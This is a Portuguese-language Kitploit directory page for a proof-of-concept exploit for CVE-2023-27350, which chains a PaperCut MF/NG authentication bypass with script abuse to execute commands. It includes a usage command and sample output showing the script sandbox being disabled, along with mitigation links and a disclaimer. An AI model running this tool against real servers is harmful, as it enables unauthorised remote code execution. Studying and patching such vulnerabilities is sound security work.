Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-27350 — Vulnerabilidade do Papercut, as versões afetadas são PaperCut MF ou NG versão 8.0 ou posterior (excluindo versões corrigidas) em todas as plataformas de SO. | Kitploit
Ferramentas/GitHubGitHub/royall-researchers/cve-2023-27350
Autenticação e AutorizaçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoRed Teaming
GitHubroyall-researchers/cve-2023-27350

CVE-2023-27350

Vulnerabilidade do Papercut, as versões afetadas são PaperCut MF ou NG versão 8.0 ou posterior (excluindo versões corrigidas) em todas as plataformas de SO.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
4há 1 anoAinda não revisado

CVE-2023-27350

POC para CVE-2023-27350 afetando PaperCut MF/NG

##Versões Afetadas 'PaperCut MF ou NG versão 8.0 ou posterior (excluindo versões corrigidas) em todas as plataformas de SO.'

Resumo

Este POC usa uma vulnerabilidade de bypass de autenticação encadeada com abuso da funcionalidade de script embutido para executar código.

Uso

root@kitploit:~
python3 CVE-2023-27350.py --url 'http://10.0.40.56:9191' --command calc.exe
[*] Papercut instance is vulnerable! Obtained valid JSESSIONID
[*] Updating print-and-device.script.enabled to Y
[*] Updating print.script.sandboxed to N
[*] Prepparing to execute...
[+] Executed successfully!
[*] Updating print-and-device.script.enabled to N
[*] Updating print.script.sandboxed to Y

Mitigações

Atualize para a versão mais recente ou mitigue seguindo as instruções no PaperCut Security Advisory

  • https://www.papercut.com/kb/Main/PO-1216-and-PO-1219

Aviso Legal

Este software foi criado puramente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis ou responsabilizáveis pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta